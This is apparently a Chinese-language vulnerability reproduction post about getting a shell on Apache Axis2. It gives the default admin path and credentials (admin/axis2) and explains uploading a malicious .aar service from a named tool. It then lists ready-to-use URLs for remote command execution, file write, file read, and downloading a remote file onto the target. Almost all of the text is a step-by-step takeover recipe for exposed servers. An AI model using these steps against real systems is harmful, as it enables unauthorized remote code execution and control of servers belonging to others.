getshell
2021-03-15
2021-03-15
Apache Axis2 后台文件上传
简介
Axis是一个开源、基于XML的Web服务架构。最开始由IBM公司研发,叫IBM-SOAP。后来由Apache基金会在SOAP的基础上推出了AXIS。AXIS本质是一个Java语言编写的SOAP引擎。利用它我们可以在各种分布式应用中,让各个应用能够彼此操作、交互。
漏洞复现
默认后台路径:/axis2-admin/login
默认账号密码:admin/axis2
工具下载地址: https://github.com/CaledoniaProject/AxisInvoker
访问后台地址,使用默认密码成功登录, 点击Upload Service上传aar包进行命令执行
上传工具中 build目录中的 aar 包,成功上传
命令执行
windows 或 linux 均可正常执行
根据工具md文档操作如下
运行命令:
1 | http://xxx.xxx.xxx.xxx/axis2/services/AxisInvoker/exec?cmd=whoami |
写文件:
1 | http://xxx.xxx.xxx.xxx/axis2/services/AxisInvoker/write?path=c:\566.txt&content=123 |
读取文件:
1 | http://xxx.xxx.xxx.xxx/axis2/services/AxisInvoker/read?path=c:\566.txt |
下载文件并将其保存
1 | http://xxx.xxx.xxx.xxx/axis2/services/AxisInvoker/download?url=http://www.baidu.com&file=c:\123.txt |